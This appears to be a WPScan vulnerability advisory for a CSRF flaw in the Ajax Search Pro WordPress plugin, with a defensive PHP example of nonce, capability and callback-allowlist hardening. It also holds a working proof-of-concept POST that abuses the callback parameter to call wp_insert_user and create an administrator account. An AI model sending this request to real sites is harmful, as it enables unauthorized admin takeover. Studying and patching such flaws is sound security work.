Ajax Search Pro <= 3.5 - Cross-Site Request Forgery (CSRF) Add User


Proof of Concept
This will register an administrator with username "xADMIN" and password "xPASS":

POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

With POST data:
wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
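As an added, defender-side illustration (not Ajax Search Pro's own code; the handler, helper and option names are assumptions), this is how an admin-ajax handler of the shape abused above is hardened: it verifies a nonce bound to the logged-in session, checks a capability, and resolves the requested callback through a fixed allowlist instead of calling whatever function name the request supplies.

```php
<?php
// Added illustration, not the plugin's code: a hypothetical admin-ajax
// handler hardened against the forged request shown above.

// Allowlist of operations this endpoint may perform. The request can only
// select a key here; it can never name an arbitrary PHP function such as
// wp_insert_user.
const WPD_SAFE_CALLBACKS = [
    'save_option' => 'wpd_save_option', // hypothetical helper below
];

function wpd_save_option( array $data ) {
    // A legitimate settings operation; input is sanitized before storage.
    $value = sanitize_text_field( $data['value'] ?? '' );
    update_option( 'wpd_example_setting', $value );
    return [ 'saved' => $value ];
}

function wpd_ajaxinput_handler() {
    // 1. Nonce: a cross-site POST cannot carry a valid nonce because the
    //    attacker's page cannot read it; check_ajax_referer() dies on failure.
    check_ajax_referer( 'wpd_ajaxinput', 'nonce' );

    // 2. Capability: a logged-in low-privilege user must not reach settings code.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Allowlist: map the requested key to a fixed function or refuse.
    $key = isset( $_POST['wpdreams_callback'] ) ? sanitize_key( $_POST['wpdreams_callback'] ) : '';
    if ( ! isset( WPD_SAFE_CALLBACKS[ $key ] ) ) {
        wp_send_json_error( 'unknown callback', 400 );
    }
    wp_send_json_success( call_user_func( WPD_SAFE_CALLBACKS[ $key ], $_POST ) );
}

// Registered for logged-in users only: no wp_ajax_nopriv_ hook is added.
add_action( 'wp_ajax_wpdreams-ajaxinput', 'wpd_ajaxinput_handler' );

// Where the settings page enqueues its script, hand the nonce to it, e.g.:
// wp_localize_script( 'wpd-settings', 'wpdAjax',
//     [ 'nonce' => wp_create_nonce( 'wpd_ajaxinput' ) ] );
```

The settings page's JavaScript then sends `nonce=<value>` with every POST; a request without it, like the one in the proof of concept, is rejected before any callback runs.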

Affects

Plugin: ajax-search-pro
Fixed in version: 4.0

References

PACKETSTORM: 130955
URL: http://web.archive.org/web/20150619084745/http://research.evex.pw/?vuln=9

Classification

Type: CSRF
OWASP Top 10: A8: Cross-Site Request Forgery (CSRF)
CWE: CWE-352

Miscellaneous

Submitter: A. Samman
Submitter Twitter: Evex_1337
Views: 357
Verified: No
WPVDB ID: 7859

Timeline

Publicly Published: 2015-03-18
Added: 2015-03-21
Last Updated: 2016-12-01

Copyright & License

Copyright: All data and resources contained within this page and this web site are Copyright © The WPScan Team.
License: Some of this data may be used for non-commercial purposes; however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license, please contact us.